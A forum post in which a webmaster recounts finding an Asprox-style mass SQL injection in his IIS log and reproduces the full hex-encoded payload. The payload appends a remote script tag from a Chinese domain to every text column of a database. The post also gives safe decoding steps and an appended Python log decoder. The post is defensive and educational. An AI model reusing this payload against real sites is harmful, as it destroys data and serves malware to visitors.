• I run a web server where the oldest pages are about 10 years old and are still in old .asp.

    Unfortunately I knew the answer very well. I had a bit of a nightmare last month, when I was checking my web server log and found some very strange entries like this:

    DO NOT RUN THIS CODE ON YOUR DB OR IT WILL BE DESTROYED

    2008-05-11 20:57:33 W3SVC2094917486 10.0.0.5 POST /Customer/Inklist.asp K=NITRO;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x44004500

    43004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800

    320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F0052002000

    46004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D002000730079007300

    6F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E0069006400

    3D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E007800740079007000

    65003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D00320033003100

    20006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00

    720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F00720020004900

    4E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900

    200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D0020007300650074002000

    5B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B002700

    2B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F0063006F006D00

    700075007400650072007300680065006C006C006F002E0063006E002F0071002E006A0073003E003C002F007300630072006900700074003E002700270027002900

    4600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E005400

    4F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F007200200044004500

    41004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 8086 - 10.0.0.1 Mozilla/3.0+(compatible;+Indy+Library) 302 0 0

    (Please note I had to break the hex code by adding carriage returns: you have to put it on a single line.

    If you want to examine the code:

    * Open a query window in SQL Server;

    * Insert:

    DECLARE @S NVARCHAR(4000);

    SET @S=CAST( and here add all the above hex on a single line [excluding the %20AS%20... of course] AS NVARCHAR(4000));

    * Remove the EXEC(@S); code!!!

    * Add a SELECT @S; line at the end.)

    I had to re-examine all of those old .asp pages and see if they were vulnerable (fortunately not, but it probably was a matter of good luck - or good programming style - because at that time SQL injection was something nobody had ever heard of, or at least I didn't).

    A few weeks later, my firewall got the signature for this attack ("Danmec.Asprox.SQL.Injection") and now recognizes those attempts, blocking them before they reach IIS.

    Examining the code was really interesting to me, because I had never seen such destructive code put into action. The attacker has some brain, and deep knowledge of the SQL Server internals. I tried to follow the .cn site where the HTML script, injected in every row of every table of the db, points (now that site is down).

    A web page using data provided by an infected table would have run a JavaScript downloaded from that computershello.cn site. This JavaScript would have opened an IFRAME pointing to other JavaScripts downloading content from several other web sites (most of them seemed to reside in China).

    Since then, my firewall has reported dozens of those attacks every day.

    Scary, isn't it?

    Bottom line is: take SQL injection risk as a real menace. There are people out there who will try everything to destroy your work and your data, for some mysterious reason! (I hope this post doesn't give some of them some bad ideas, my purpose was the exact opposite.)
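An added example, not part of the original post: the decoding procedure described above, done offline in Python instead of a SQL Server query window, so the hidden statement is only ever printed as text. The function names and the sample log lines are constructed for illustration, and the sample payload is a harmless statement, not the one from the post.

```python
import re
from urllib.parse import unquote

# CAST(0x<hex> AS [N]VARCHAR(...)), tolerating line breaks inside the hex
CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-F\s]+?)\s+AS\s+(N?VARCHAR)", re.I)
# DECLARE ... CAST(0x<long hex> ... EXEC(@var): the shape of the logged request
INJECTION_SHAPE = re.compile(
    r"DECLARE\s+@\w+.*CAST\(\s*0x[0-9A-F]{16,}.*EXEC\s*\(\s*@\w+", re.I | re.S)


def decode_cast_payloads(text):
    """Return the SQL text hidden in each CAST(0x.. AS [N]VARCHAR), never executing it."""
    decoded = []
    for hex_blob, sql_type in CAST_HEX.findall(unquote(text)):
        digits = re.sub(r"\s+", "", hex_blob)
        if len(digits) % 2:  # truncated log line: drop the dangling nibble
            digits = digits[:-1]
        raw = bytes.fromhex(digits)
        # NVARCHAR literals are UTF-16LE, VARCHAR literals are single-byte
        encoding = "utf-16-le" if sql_type.upper() == "NVARCHAR" else "latin-1"
        decoded.append(raw.decode(encoding, errors="replace"))
    return decoded


def scan_log(lines):
    """Return (line_number, decoded_payloads) for every line matching the injection shape."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if INJECTION_SHAPE.search(unquote(line)):
            hits.append((number, decode_cast_payloads(line)))
    return hits


# Constructed sample data: a harmless statement encoded the same way
_HEX = "SELECT 'decoded, not executed'".encode("utf-16-le").hex().upper()
SAMPLE_LOG = [
    "2008-05-11 20:57:30 W3SVC1 10.0.0.5 GET /Customer/Inklist.asp K=NITRO "
    "80 - 10.0.0.1 Mozilla/4.0 200 0 0",
    "2008-05-11 20:57:33 W3SVC1 10.0.0.5 POST /Customer/Inklist.asp "
    f"K=NITRO;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x{_HEX}"
    "%20AS%20NVARCHAR(4000));EXEC(@S);-- "
    "80 - 10.0.0.1 Mozilla/3.0+(compatible;+Indy+Library) 302 0 0",
]

if __name__ == "__main__":
    for number, payloads in scan_log(SAMPLE_LOG):
        print(f"line {number}: {payloads}")
```

Because whitespace inside the hex is stripped before decoding, a payload pasted with the line breaks left in still decodes.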